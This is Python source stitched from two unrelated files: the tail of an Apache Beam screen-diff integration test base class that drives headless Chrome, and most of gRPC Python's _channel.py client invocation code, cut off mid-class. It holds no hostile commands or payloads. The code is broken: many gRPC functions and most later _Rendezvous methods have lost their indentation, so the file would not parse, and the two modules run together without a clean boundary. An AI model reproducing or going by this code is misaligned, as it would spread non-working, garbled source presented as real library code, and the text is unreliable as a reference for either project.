    generated by the corresponding notebook executions."""
    return self._test_urls

  @property
  def notebook_path_to_test_id(self):
    """Mapping from input notebook paths to their obfuscated execution/test ids.
    """
    return self._notebook_executor.notebook_path_to_execution_id
def should_skip():
  """Whether a screen diff test should be skipped."""
  # Guard clauses; evaluation order matches the original short-circuit
  # (platform is checked before touching the interactive environment).
  if platform.system() not in _SUPPORTED_PLATFORMS:
    return True
  if not ie.current_env().is_interactive_ready:
    return True
  return not _interactive_integration_ready
if should_skip():
  # Dependencies missing or platform unsupported: publish a stub BaseTestCase
  # that both unittest and pytest will skip.

  @unittest.skip(
      reason='[interactive] and [interactive_test] deps are both required.')
  @pytest.mark.skip(
      reason='[interactive] and [interactive_test] deps are both required.')
  class BaseTestCase(unittest.TestCase):
    """A skipped base test case if interactive_test dependency is not installed.
    """
    pass
else:

  class BaseTestCase(NeedleTestCase):
    """A base test case to execute screen diff integration tests."""
    # Whether the browser should be headless.
    _headless = True

    def __init__(self, *args, **kwargs):
      """Initializes a test.

      Some kwargs that could be configured:

        #. golden_dir=<path>. A directory path pointing to all the golden
           screenshots as baselines for comparison.
        #. test_notebook_dir=<path>. A path pointing to a directory of
           notebook files in ipynb format.
        #. headless=<True/False>. Whether the browser should be headless when
           executing the tests.
        #. golden_size=<(int, int)>. The size of the screenshot to take and
           compare.
        #. cleanup=<True/False>. Whether to clean up the output directory.
           Should always be True in automated test environment. When debugging,
           turn it False to manually check the output for difference.
        #. threshold=<float>. An image difference threshold, when the image
           pixel distance is bigger than the value, the test will fail.
      """
      golden_root = kwargs.pop(
          'golden_dir',
          'apache_beam/runners/interactive/testing/integration/goldens')
      # Goldens are stored per platform (see _SUPPORTED_PLATFORMS).
      self._golden_dir = os.path.join(golden_root, platform.system())
      self._test_notebook_dir = kwargs.pop(
          'test_notebook_dir',
          'apache_beam/runners/interactive/testing/integration/test_notebooks')
      BaseTestCase._headless = kwargs.pop('headless', True)
      self._test_env = None
      self._viewport_width, self._viewport_height = kwargs.pop(
          'golden_size', (1024, 10000))
      self._cleanup = kwargs.pop('cleanup', True)
      self._threshold = kwargs.pop('threshold', 5000)
      # Needle reads these two attributes to locate baselines and outputs.
      self.baseline_directory = os.path.join(os.getcwd(), self._golden_dir)
      self.output_directory = os.path.join(
          os.getcwd(), self._test_notebook_dir, 'output')
      super(BaseTestCase, self).__init__(*args, **kwargs)

    @classmethod
    def get_web_driver(cls):
      # Chrome flags suitable for containerized CI environments.
      chrome_options = Options()
      if cls._headless:
        chrome_options.add_argument('--headless')
      chrome_options.add_argument('--no-sandbox')
      chrome_options.add_argument('--disable-dev-shm-usage')
      chrome_options.add_argument('--force-color-profile=srgb')
      return NeedleChrome(options=chrome_options)

    def setUp(self):
      self.set_viewport_size(self._viewport_width, self._viewport_height)

    def run(self, result=None):
      # Each run executes the notebooks and serves their HTML for the
      # duration of the test via the context-managed environment.
      with ScreenDiffIntegrationTestEnvironment(self._test_notebook_dir,
                                                self._golden_dir,
                                                self._cleanup) as test_env:
        self._test_env = test_env
        super(BaseTestCase, self).run(result)

    def explicit_wait(self):
      """Wait for common elements to be visible."""
      WebDriverWait(self.driver, 5).until(
          expected_conditions.visibility_of_element_located(
              (By.TAG_NAME, 'facets-overview')))
      WebDriverWait(self.driver, 5).until(
          expected_conditions.visibility_of_element_located(
              (By.TAG_NAME, 'facets-dive')))

    def assert_all(self):
      """Asserts screenshots for all notebooks in the test_notebook_path."""
      for test_id, test_url in self._test_env.test_urls.items():
        self.driver.get(test_url)
        self.explicit_wait()
        self.assertScreenshot('body', test_id, self._threshold)

    def assert_single(self, test_id):
      """Asserts the screenshot for a single test. The given test id will be the
      name of the golden screenshot."""
      test_url = self._test_env.test_urls.get(test_id, None)
      assert test_url, '{} is not a valid test id.'.format(test_id)
      self.driver.get(test_url)
      self.explicit_wait()
      self.assertScreenshot('body', test_id, self._threshold)

    def assert_notebook(self, notebook_name):
      """Asserts the screenshot for a single notebook. The notebook with the
      given notebook_name under test_notebook_dir will be executed and asserted.
      """
      if not notebook_name.endswith('.ipynb'):
        notebook_name += '.ipynb'
      notebook_path = os.path.join(self._test_notebook_dir, notebook_name)
      test_id = self._test_env.notebook_path_to_test_id.get(notebook_path, None)
      assert test_id, 'Cannot find notebook with name {}.'.format(notebook_name)
      self.assert_single(test_id)
# This module defines no tests of its own; the lines below only exist so that
# lint accepts the file as a runnable test module.
if __name__ == '__main__':
  unittest.main()
|
_channel.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import functools
import logging
import sys
import threading
import time
import grpc
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)

_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)

# No special flags on any batch operation.
_EMPTY_FLAGS = 0

# For each RPC arity, the completion-queue operation types that are initially
# outstanding ("due") on the invocation side (see _RPCState.due).
_UNARY_UNARY_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.send_message,
    cygrpc.OperationType.send_close_from_client,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_message,
    cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.send_message,
    cygrpc.OperationType.send_close_from_client,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_message,
    cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_status_on_client,
)

_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
    'Exception calling channel subscription callback!')

# repr() templates for terminated RPCs, with and without debug detail.
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
                              '\tstatus = {}\n'
                              '\tdetails = "{}"\n'
                              '>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
                                  '\tstatus = {}\n'
                                  '\tdetails = "{}"\n'
                                  '\tdebug_error_string = "{}"\n'
                                  '>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
class _RPCState(object):
    """Mutable, condition-guarded state shared by all views of one RPC."""

    def __init__(self, due, initial_metadata, trailing_metadata, code, details):
        # All fields below are read/written only while holding this condition.
        self.condition = threading.Condition()
        # The cygrpc.OperationType objects representing events due from the RPC's
        # completion queue.
        self.due = set(due)
        self.initial_metadata = initial_metadata
        self.response = None
        self.trailing_metadata = trailing_metadata
        self.code = code
        self.details = details
        self.debug_error_string = None
        # The semantics of grpc.Future.cancel and grpc.Future.cancelled are
        # slightly wonky, so they have to be tracked separately from the rest of the
        # result of the RPC. This field tracks whether cancellation was requested
        # prior to termination of the RPC.
        self.cancelled = False
        self.callbacks = []
        self.fork_epoch = cygrpc.get_fork_epoch()

    def reset_postfork_child(self):
        # A condition (and its lock) must not be shared across a fork; give
        # the child a fresh one.
        self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
    """Fold one completion-queue event into *state*.

    Removes each completed operation from ``state.due``, records received
    metadata/messages/status, and returns the done-callbacks the caller must
    invoke (outside the lock).  Caller holds ``state.condition``.
    """
    callbacks = []
    for batch_operation in event.batch_operations:
        operation_type = batch_operation.type()
        state.due.remove(operation_type)
        if operation_type == cygrpc.OperationType.receive_initial_metadata:
            state.initial_metadata = batch_operation.initial_metadata()
        elif operation_type == cygrpc.OperationType.receive_message:
            serialized_response = batch_operation.message()
            if serialized_response is not None:
                response = _common.deserialize(serialized_response,
                                               response_deserializer)
                if response is None:
                    details = 'Exception deserializing response!'
                    _abort(state, grpc.StatusCode.INTERNAL, details)
                else:
                    state.response = response
        elif operation_type == cygrpc.OperationType.receive_status_on_client:
            state.trailing_metadata = batch_operation.trailing_metadata()
            if state.code is None:
                code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
                    batch_operation.code())
                if code is None:
                    state.code = grpc.StatusCode.UNKNOWN
                    # Bug fix: previously this passed `code`, which is always
                    # None on this branch, so the message read "unknown code
                    # None".  Report the raw cygrpc code instead.
                    state.details = _unknown_code_details(
                        batch_operation.code(), batch_operation.details())
                else:
                    state.code = code
                    state.details = batch_operation.details()
                state.debug_error_string = batch_operation.error_string()
            # Status arrival terminates the RPC: collect and detach callbacks.
            callbacks.extend(state.callbacks)
            state.callbacks = None
    return callbacks
def _event_handler(state, response_deserializer):
    """Create a completion-queue event callback bound to *state*."""

    def handle_event(event):
        with state.condition:
            callbacks = _handle_event(event, state, response_deserializer)
            state.condition.notify_all()
            done = not state.due
        # Invoke user callbacks outside the lock to avoid re-entrancy deadlocks.
        for callback in callbacks:
            callback()
        # NOTE(review): the fork-epoch comparison presumably prevents a
        # post-fork child from treating a pre-fork event as completion —
        # confirm against cygrpc's fork-support semantics.
        return done and state.fork_epoch >= cygrpc.get_fork_epoch()

    return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
                              event_handler):
    """Consume a request iterator supplied by the user."""

    def consume_request_iterator():  # pylint: disable=too-many-branches
        # Iterate over the request iterator until it is exhausted or an error
        # condition is encountered.
        while True:
            return_from_user_request_generator_invoked = False
            try:
                # The thread may die in user-code. Do not block fork for this.
                cygrpc.enter_user_request_generator()
                request = next(request_iterator)
            except StopIteration:
                break
            except Exception:  # pylint: disable=broad-except
                cygrpc.return_from_user_request_generator()
                return_from_user_request_generator_invoked = True
                code = grpc.StatusCode.UNKNOWN
                details = 'Exception iterating requests!'
                _LOGGER.exception(details)
                # A failing user iterator aborts the whole RPC.
                call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
                            details)
                _abort(state, code, details)
                return
            finally:
                if not return_from_user_request_generator_invoked:
                    cygrpc.return_from_user_request_generator()
            serialized_request = _common.serialize(request, request_serializer)
            with state.condition:
                if state.code is None and not state.cancelled:
                    if serialized_request is None:
                        code = grpc.StatusCode.INTERNAL
                        details = 'Exception serializing request!'
                        call.cancel(
                            _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
                            details)
                        _abort(state, code, details)
                        return
                    else:
                        operations = (cygrpc.SendMessageOperation(
                            serialized_request, _EMPTY_FLAGS),)
                        operating = call.operate(operations, event_handler)
                        if operating:
                            state.due.add(cygrpc.OperationType.send_message)
                        else:
                            return

                        # Block until this message's send completes (or the
                        # RPC terminates) before pulling the next request.
                        def _done():
                            return (state.code is not None or
                                    cygrpc.OperationType.send_message not in
                                    state.due)

                        _common.wait(
                            state.condition.wait,
                            _done,
                            spin_cb=functools.partial(
                                cygrpc.block_if_fork_in_progress, state))
                        if state.code is not None:
                            return
                else:
                    return
        # Iterator exhausted normally: half-close the request stream.
        with state.condition:
            if state.code is None:
                operations = (
                    cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
                operating = call.operate(operations, event_handler)
                if operating:
                    state.due.add(cygrpc.OperationType.send_close_from_client)

    consumption_thread = cygrpc.ForkManagedThread(
        target=consume_request_iterator)
    consumption_thread.setDaemon(True)
    consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
    def __init__(self, state, call, response_deserializer, deadline):
        """Bind this error/future/call view to one in-flight RPC.

        Args:
          state: the shared _RPCState guarded by its condition.
          call: the underlying cygrpc call object.
          response_deserializer: callable turning wire bytes into responses.
          deadline: absolute wall-clock deadline in seconds, or None.
        """
        super(_Rendezvous, self).__init__()
        self._state = state
        self._call = call
        self._response_deserializer = response_deserializer
        self._deadline = deadline
    def cancel(self):
        """Request local cancellation of the RPC (grpc.Future interface).

        Always returns False here: termination is reported asynchronously via
        the completion queue, never synchronously by this call.
        """
        with self._state.condition:
            if self._state.code is None:
                code = grpc.StatusCode.CANCELLED
                details = 'Locally cancelled by application!'
                self._call.cancel(
                    _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
                # Track the cancellation request separately from the outcome.
                self._state.cancelled = True
                _abort(self._state, code, details)
                self._state.condition.notify_all()
            return False
    def cancelled(self):
        # True iff cancellation was requested locally (grpc.Future interface).
        with self._state.condition:
            return self._state.cancelled
    def running(self):
        # The RPC is running until a terminal status code is recorded.
        with self._state.condition:
            return self._state.code is None
    def done(self):
        # Done once a terminal status code has been recorded.
        with self._state.condition:
            return self._state.code is not None
    def _is_complete(self):
        # Lock-free predicate used as the wait condition by result()/exception()
        # and friends; callers hold self._state.condition.
        return self._state.code is not None
    def result(self, timeout=None):
        """Returns the result of the computation or raises its exception.

        See grpc.Future.result for the full API contract.
        """
        with self._state.condition:
            # Block until the RPC reaches a terminal state or timeout elapses.
            timed_out = _common.wait(
                self._state.condition.wait, self._is_complete, timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    return self._state.response
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    # This object is itself the RpcError describing the failure.
                    raise self
    def exception(self, timeout=None):
        """Return the exception raised by the computation.

        See grpc.Future.exception for the full API contract.
        """
        with self._state.condition:
            # Block until the RPC reaches a terminal state or timeout elapses.
            timed_out = _common.wait(
                self._state.condition.wait, self._is_complete, timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    # Success: there is no exception to return.
                    return None
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    # Returned (not raised): this object is the RpcError.
                    return self
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
See grpc.future.traceback for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(
self._state.condition.wait, self._is_complete, timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
def _response_ready():
return (
self._state.response is not None or
(cygrpc.OperationType.receive_message not in self._state.due
and self._state.code is not None))
_common.wait(self._state.condition.wait, _response_ready)
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
def _done():
return self._state.initial_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
def _done():
return self._state.trailing_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.trailing_metadata
def code(self):
with self._state.condition:
def _done():
return self._state.code is not None
_common.wait(self._state.condition.wait, _done)
return self._state.code
def details(self):
with self._state.condition:
def _done():
return self._state.details is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
def _done():
return self._state.debug_error_string is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
    """Serialize a unary request and compute its deadline.

    Returns a ``(deadline, serialized_request, rendezvous)`` triple; exactly
    one of the last two is None depending on whether serialization succeeded.
    """
    deadline = _deadline(timeout)
    serialized = _common.serialize(request, request_serializer)
    if serialized is not None:
        return deadline, serialized, None
    # Serialization failed: hand the caller an already-terminated
    # _Rendezvous carrying INTERNAL status instead of a request payload.
    failure_state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
                              'Exception serializing request!')
    return deadline, None, _Rendezvous(failure_state, None, None, deadline)
def _end_unary_response_blocking(state, call, with_call, deadline):
    """Conclude a blocking unary RPC.

    Raises a _Rendezvous for any non-OK status; otherwise returns the
    response, optionally paired with a _Rendezvous exposing call details.
    """
    if state.code is not grpc.StatusCode.OK:
        raise _Rendezvous(state, None, None, deadline)
    if with_call:
        return state.response, _Rendezvous(state, call, None, deadline)
    return state.response
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
    """Build the two operation sets for a stream-unary invocation.

    The first set carries the send/receive work; the second solely receives
    initial metadata.
    """
    primary_operations = (
        cygrpc.SendInitialMetadataOperation(metadata, initial_metadata_flags),
        cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
        cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
    )
    metadata_operations = (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),)
    return (primary_operations, metadata_operations)
def _stream_unary_invocation_operationses_and_tags(metadata,
                                                   initial_metadata_flags):
    """Pair each stream-unary operation set with a None tag."""
    tagged = []
    for operations in _stream_unary_invocation_operationses(
            metadata, initial_metadata_flags):
        tagged.append((operations, None))
    return tuple(tagged)
def _determine_deadline(user_deadline):
    """Combine the caller-supplied deadline with any servicing-context
    deadline, taking the earlier of the two when both are set."""
    parent_deadline = cygrpc.get_deadline_from_context()
    if parent_deadline is None:
        return user_deadline
    if user_deadline is None:
        return parent_deadline
    return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
    """Invocation-side callable for unary-request/unary-response RPCs."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
        """Serialize the request and assemble the operations for one RPC.

        Returns (state, operations, deadline, rendezvous); on serialization
        failure state is None and rendezvous carries the error.
        """
        deadline, serialized_request, rendezvous = _start_unary_request(
            request, timeout, self._request_serializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        if serialized_request is None:
            return None, None, None, rendezvous
        else:
            state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
            operations = (
                cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                    initial_metadata_flags),
                cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
                cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
            )
            return state, operations, deadline, None

    def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
                  compression):
        """Run the RPC to completion on the calling thread."""
        state, operations, deadline, rendezvous = self._prepare(
            request, timeout, metadata, wait_for_ready, compression)
        if state is None:
            raise rendezvous  # pylint: disable-msg=raising-bad-type
        else:
            call = self._channel.segregated_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, _determine_deadline(deadline), metadata,
                None if credentials is None else credentials._credentials, ((
                    operations,
                    None,
                ),), self._context)
            event = call.next_event()
            _handle_event(event, state, self._response_deserializer)
            return state, call

    def __call__(self,
                 request,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        """Invoke the RPC synchronously and return the response message."""
        state, call, = self._blocking(request, timeout, metadata, credentials,
                                      wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, False, None)

    def with_call(self,
                  request,
                  timeout=None,
                  metadata=None,
                  credentials=None,
                  wait_for_ready=None,
                  compression=None):
        """Invoke synchronously, returning (response, call-details object)."""
        state, call, = self._blocking(request, timeout, metadata, credentials,
                                      wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, True, None)

    def future(self,
               request,
               timeout=None,
               metadata=None,
               credentials=None,
               wait_for_ready=None,
               compression=None):
        """Invoke asynchronously, returning a _Rendezvous future."""
        state, operations, deadline, rendezvous = self._prepare(
            request, timeout, metadata, wait_for_ready, compression)
        if state is None:
            raise rendezvous  # pylint: disable-msg=raising-bad-type
        else:
            event_handler = _event_handler(state, self._response_deserializer)
            call = self._managed_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, deadline, metadata, None
                if credentials is None else credentials._credentials,
                (operations,), event_handler, self._context)
            return _Rendezvous(state, call, self._response_deserializer,
                               deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
    """Invocation-side callable for unary-request/stream-response RPCs."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def __call__(  # pylint: disable=too-many-locals
            self,
            request,
            timeout=None,
            metadata=None,
            credentials=None,
            wait_for_ready=None,
            compression=None):
        """Start the RPC and return a _Rendezvous iterating its responses."""
        deadline, serialized_request, rendezvous = _start_unary_request(
            request, timeout, self._request_serializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        if serialized_request is None:
            raise rendezvous  # pylint: disable-msg=raising-bad-type
        else:
            augmented_metadata = _compression.augment_metadata(
                metadata, compression)
            state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
            # Two operation sets: the send/receive-status set, and a separate
            # one solely for receiving initial metadata.
            operationses = (
                (
                    cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                        initial_metadata_flags),
                    cygrpc.SendMessageOperation(serialized_request,
                                                _EMPTY_FLAGS),
                    cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
                    cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
                ),
                (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
            )
            call = self._managed_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, _determine_deadline(deadline), metadata,
                None if credentials is None else
                credentials._credentials, operationses,
                _event_handler(state,
                               self._response_deserializer), self._context)
            return _Rendezvous(state, call, self._response_deserializer,
                               deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
    """Invocation-side callable for stream-request/unary-response RPCs."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def _blocking(self, request_iterator, timeout, metadata, credentials,
                  wait_for_ready, compression):
        """Drive the RPC synchronously, draining events until none are due."""
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        call = self._channel.segregated_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), augmented_metadata, None
            if credentials is None else credentials._credentials,
            _stream_unary_invocation_operationses_and_tags(
                augmented_metadata, initial_metadata_flags), self._context)
        # Requests are fed to the call from a separate consumption thread.
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, None)
        while True:
            event = call.next_event()
            with state.condition:
                _handle_event(event, state, self._response_deserializer)
                state.condition.notify_all()
                if not state.due:
                    # All outstanding operations have completed.
                    break
        return state, call

    def __call__(self,
                 request_iterator,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        """Invoke synchronously and return the response message."""
        state, call, = self._blocking(request_iterator, timeout, metadata,
                                      credentials, wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, False, None)

    def with_call(self,
                  request_iterator,
                  timeout=None,
                  metadata=None,
                  credentials=None,
                  wait_for_ready=None,
                  compression=None):
        """Invoke synchronously, returning (response, call-details object)."""
        state, call, = self._blocking(request_iterator, timeout, metadata,
                                      credentials, wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, True, None)

    def future(self,
               request_iterator,
               timeout=None,
               metadata=None,
               credentials=None,
               wait_for_ready=None,
               compression=None):
        """Invoke asynchronously, returning a _Rendezvous future."""
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
        event_handler = _event_handler(state, self._response_deserializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        call = self._managed_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, deadline, augmented_metadata, None
            if credentials is None else credentials._credentials,
            # NOTE(review): raw `metadata` (not augmented_metadata) is passed
            # to the operation sets here — confirm this asymmetry with
            # _blocking is intended.
            _stream_unary_invocation_operationses(
                metadata, initial_metadata_flags), event_handler, self._context)
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, event_handler)
        return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
    """Invocation-side callable for stream-request/stream-response RPCs."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def __call__(self,
                 request_iterator,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        """Start the RPC and return a _Rendezvous iterating its responses."""
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        # Main operation set plus a separate initial-metadata receive set.
        operationses = (
            (
                cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                    initial_metadata_flags),
                cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
            ),
            (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
        )
        event_handler = _event_handler(state, self._response_deserializer)
        call = self._managed_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), augmented_metadata, None
            if credentials is None else credentials._credentials, operationses,
            event_handler, self._context)
        # Requests are fed to the call from a separate consumption thread.
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, event_handler)
        return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
    """Stores immutable initial metadata flags"""

    def __new__(cls, value=_EMPTY_FLAGS):
        value &= cygrpc.InitialMetadataFlags.used_mask
        return super(_InitialMetadataFlags, cls).__new__(cls, value)

    def with_wait_for_ready(self, wait_for_ready):
        """Return a copy with wait-for-ready bits applied.

        ``None`` means "unspecified" and leaves the flags untouched; True
        or False both mark the choice as explicitly set.
        """
        if wait_for_ready is None:
            return self
        ready_bit = cygrpc.InitialMetadataFlags.wait_for_ready
        explicit_bit = cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set
        if wait_for_ready:
            return self.__class__(self | ready_bit | explicit_bit)
        return self.__class__((self & ~ready_bit) | explicit_bit)
class _ChannelCallState(object):
def __init__(self, channel):
